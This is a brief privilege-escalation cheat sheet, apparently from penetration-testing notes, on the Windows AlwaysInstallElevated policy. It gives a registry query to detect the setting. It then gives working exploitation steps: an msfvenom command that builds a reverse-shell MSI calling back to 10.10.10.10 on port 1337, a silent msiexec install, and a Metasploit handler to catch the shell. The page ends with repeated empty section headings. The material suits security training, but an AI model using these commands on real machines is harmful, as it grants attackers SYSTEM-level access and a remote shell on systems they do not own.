Always Install Elevated

AlwaysInstallElevated is a Windows policy setting that allows MSI installers to run with elevated (admin) privileges. It is configured via Group Policy or registry keys. While useful for deploying software enterprise-wide, it poses a serious security risk if misused, as attackers can exploit it to gain system-level access. It is recommended to disable this setting unless absolutely necessary.

Enumeration

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

# If the above commands shows the key exists, it is enabled.

Exploitation

msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.10 lport=1337 -f msi > shell.msi

# Execute the binary
msiexec /i C:\Users\rezydev\Desktop\shell.msi /quiet /qn /norestart

# Catch the shell using msfconsole's multi/handler.

Enumeration​

Exploitation​

Enumeration

Exploitation